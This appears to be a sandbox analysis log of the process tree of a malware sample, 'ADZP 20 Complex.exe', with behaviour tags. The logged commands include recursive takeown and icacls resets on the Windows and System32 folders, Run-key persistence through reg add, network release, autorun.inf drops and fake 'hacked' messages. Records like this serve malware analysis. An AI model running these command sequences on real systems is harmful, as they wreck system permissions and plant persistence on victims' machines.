C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado7⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!7⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7896.tmp\7897.tmp\7898.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\659C.tmp\659D.tmp\659E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8EEE.tmp\8EEF.tmp\8EF0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
-
C:\Windows\explorer.exeexplorer.exe7⤵
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9A86.tmp\9A87.tmp\9A88.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""8⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"9⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat9⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q10⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r10⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"10⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q10⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r10⤵
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f9⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release9⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f9⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado9⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\659D.tmp\659D.tmp\659E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8EFE.tmp\8EFF.tmp\8F00.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""10⤵
-
C:\Windows\system32\notepad.exenotepad9⤵
-
C:\Windows\system32\calc.execalc9⤵
-
C:\Windows\explorer.exeexplorer.exe9⤵
-
C:\Windows\system32\mspaint.exemspaint.exe9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"9⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"9⤵
-
C:\Windows\system32\notepad.exenotepad7⤵
-
C:\Windows\system32\calc.execalc7⤵
-
C:\Windows\explorer.exeexplorer.exe7⤵
-
C:\Windows\system32\mspaint.exemspaint.exe7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"7⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"7⤵
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\explorer.exeexplorer.exe5⤵
-
C:\Windows\system32\calc.execalc5⤵
- Modifies registry class
-
C:\Windows\explorer.exeexplorer.exe5⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe5⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BDF6.tmp\BDF7.tmp\BDF8.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""4⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat5⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Modifies file permissions
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows\System32"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r6⤵
- Possible privilege escalation attempt
-
C:\Windows\system32\icacls.exeicacls "C:\Windows" /reset /t /c /q6⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32" /reset /t /c /q6⤵
-
C:\Windows\system32\tree.comtree "C:\Windows"6⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f5⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f5⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release5⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f5⤵
- Kills process with taskkill
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"5⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"5⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado5⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!5⤵
-
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\158.tmp\159.tmp\169.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""6⤵
- Checks computer location settings
- Drops autorun.inf file
- Modifies registry class
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat7⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows" /r8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f7⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f7⤵
-
